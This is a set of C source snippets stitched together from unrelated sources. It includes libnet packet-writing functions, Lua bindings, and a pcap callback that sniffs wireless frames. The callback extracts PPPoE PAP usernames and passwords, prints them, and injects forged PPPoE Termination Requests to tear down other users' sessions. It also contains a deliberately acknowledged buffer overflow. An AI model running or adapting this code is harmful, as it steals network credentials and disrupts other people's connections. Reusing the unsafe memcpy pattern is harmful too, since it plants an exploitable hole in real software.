int libnet_adv_write_link(libnet_t *l, const uint8_t *packet, uint32_t packet_s) { int c; if (l->injection_type != LIBNET_LINK_ADV) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): advanced link mode not enabled\n", __func__); return (-1); } c = libnet_write_link(l, packet, packet_s); /* do statistics */ if (c == packet_s) { l->stats.packets_sent++; l->stats.bytes_written += c; } else { l->stats.packet_errors++; /* * XXX - we probably should have a way to retrieve the number of * bytes actually written (since we might have written something). */ if (c > 0) { l->stats.bytes_written += c; } } return (c); }
static int lnet_link (lua_State *L) { libnet_t** ud = luaL_checkudata(L, 1, L_NET_REGID); luaL_argcheck(L, *ud, 1, "net has been destroyed"); size_t payloadsz = 0; const char* payload = luaL_checklstring(L, 2, &payloadsz); int size = libnet_write_link(*ud, (uint8_t*)payload, payloadsz); lua_pushinteger(L, size); return 1; }
/*- -- size = net:write_link(link_pdu) Writes link_pdu raw at the link layer, you are responsible for forming the link-layer header. Returns the size written on success. */ static int lnet_write_link (lua_State *L) { libnet_t* ud = checkudata(L); size_t payloadsz_ = 0; const char* payload_ = luaL_checklstring(L, 2, &payloadsz_); uint32_t payloadsz = (uint32_t) payloadsz_; const uint8_t* payload = (const uint8_t*) payload_; int size = libnet_write_link(ud, payload, payloadsz); check_error(L, ud, size); lua_pushinteger(L, size); return 1; }
int libnet_write(libnet_t *l) { int c; uint32_t len; uint8_t *packet = NULL; if (l == NULL) { return (-1); } c = libnet_pblock_coalesce(l, &packet, &len); if (c == - 1) { /* err msg set in libnet_pblock_coalesce() */ return (-1); } /* assume error */ c = -1; switch (l->injection_type) { case LIBNET_RAW4: case LIBNET_RAW4_ADV: if (len > LIBNET_MAX_PACKET) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): packet is too large (%d bytes)\n", __func__, len); goto done; } c = libnet_write_raw_ipv4(l, packet, len); break; case LIBNET_RAW6: case LIBNET_RAW6_ADV: c = libnet_write_raw_ipv6(l, packet, len); break; case LIBNET_LINK: case LIBNET_LINK_ADV: c = libnet_write_link(l, packet, len); break; default: snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): unsuported injection type\n", __func__); goto done; } /* do statistics */ if (c == len) { l->stats.packets_sent++; l->stats.bytes_written += c; } else { l->stats.packet_errors++; /* * XXX - we probably should have a way to retrieve the number of * bytes actually written (since we might have written something). */ if (c > 0) { l->stats.bytes_written += c; } } done: /* * Restore original pointer address so free won't complain about a * modified chunk pointer. */ if (l->aligner > 0) { packet = packet - l->aligner; } free(packet); return (c); }
void pcap_callback(u_char *user, const struct pcap_pkthdr *h, const u_char *bytes) { u_char *p; struct ieee80211_frame *pieee; //awesome name ^_^ struct pppoe_session *ppppoe; //awesome name too o_o p = (u_char *)bytes; p += ((struct ieee80211_radiotap_header*)p)->it_len; //skip radiotap header pieee = (struct ieee80211_frame*)p; if(!(((pieee->i_fc >> 2) & 0b11) == 2)) { //Is it Data frame? //printf("Data %d", (pieee->i_fc >> 2) & 0b11); return; } { int t; t = pieee->i_fc>>8 & 0b11; if(t == 0 || t == 3) { // IBSS or DS -> DS frame return; } } p += sizeof(struct ieee80211_frame);// skip ieee80211_frame header //if(((pieee->i_fc >> 4) & 0b1111) == 8) { //What?! QoS Frame? // p += 2; // The additional qos field, nasty hack though. //} if(0x8864 == ntohs(*(uint16_t*)(&p[6]))) { //The type field in LLC header, is it PPPoE Session? // Got one p += 8; //sizeof LLC header ppppoe = (struct pppoe_session *)p; p += sizeof(struct pppoe_session); if(0xc023 == ntohs(*(uint16_t*)p) && // Password Authentication Protocol p[2] == 0x01) { //Code == Authenticate-Request, GOT IT! /* PPP PAP { * Code: 1 byte * Identifier: 1 byte * Length: 2 byte, BIG ENDIAN * Data: { * len_username: 1 byte * username: len_username bytes * len_password: 1 byte * password: len_password bytes * } * } */ int len; char buf[100]; //YES this is a *BUFFER OVERFLOW* vulnerability, I aware of it. p += 6; // points to len_username len = *p; memcpy(buf, p+1, len); buf[len] = 0; printf("\nWe got an account: %s/", buf); p += len+1; len = *p; memcpy(buf, p+1, len); buf[len] = 0; printf("%s Session ID: 0x%04X\n", buf, ntohs(ppppoe->session_id)); return; } else if(0xc021 == ntohs(*(uint16_t*)p) && // Link Control Protocol p[2] == 0x06) { //Code == Termination Ack printf("\nPPP Link 0x%04lX is down.\n", (u_long)ntohs(ppppoe->session_id)); } else { // ordinary data frames u_short sessid; sessid = ntohs(ppppoe->session_id); pktcount[sessid]++; if(verbose) write(STDOUT_FILENO, ".", 1); //printf buffers your input, &*%^&#$%^@ if(pktcount[sessid] > 30) { //TIME TO TEAR IT DOWN!!!! u_char buf[200]; memset(buf, 0, sizeof buf); p = buf; memcpy(p, u8aRadiotap, sizeof u8aRadiotap); //radiotap header p[8] = 11; //rate, 5.5M p += sizeof(u8aRadiotap); //IEEE802.11 frame # define P ((struct ieee80211_frame *)p) # ifdef QOS_FRAME P->i_fc = 0x188; // QoS Data frame, STA -> DS # else P->i_fc = 0x108; // Data frame, STA -> DS # endif switch(((pieee->i_fc)>>8) & 0b11) { // ToDS && FromDS flag case 1: // STA -> DS /* memcpy(P->i_addr1, pieee->i_addr1, 6); // BSSID memcpy(P->i_addr2, pieee->i_addr2, 6); // Source memcpy(P->i_addr3, pieee->i_addr3, 6); // Destination */ memcpy(P->i_addr1, pieee->i_addr1, 6*3); // all things break; case 2: // DS -> STA memcpy(P->i_addr1, pieee->i_addr2, 6); // BSSID memcpy(P->i_addr2, pieee->i_addr1, 6); // Source memcpy(P->i_addr3, pieee->i_addr3, 6); // Destination break; default: { pcap_dumper_t *pd; printf("\nHoly shit, what is it?!\n"); pd = pcap_dump_open(pcap_context, "/dev/shm/whatdamnpacket"); pcap_dump((u_char*)pd, h, bytes); pcap_dump_close(pd); pcap_breakloop(pcap_context); return; } break; } P->i_dur = 127; // Duration, from wireshark, in microseconds P->i_seq = ((pieee->i_seq >> 4) + 5) << 4; // Sequence number p += sizeof(struct ieee80211_frame); # undef P //Logical Link Control memcpy(p, llcData, sizeof llcData); p+=sizeof llcData; //PPPoE Termination Request memcpy(p, pppoeTerminate, sizeof pppoeTerminate); ((struct pppoe_session *)p)->session_id = ppppoe->session_id; //Session ID p[9] = 1; //Identifier p += sizeof pppoeTerminate; libnet_write_link(libnet_context, buf, p - buf); // Send the packet! //printf("%08lX, %08lX, %08lX, %ld\n", libnet_context, buf, p, p - buf); printf("\nSent PPP Termination Request for Session 0x%04lX\n", (u_long)sessid); pktcount[sessid] = 0; } }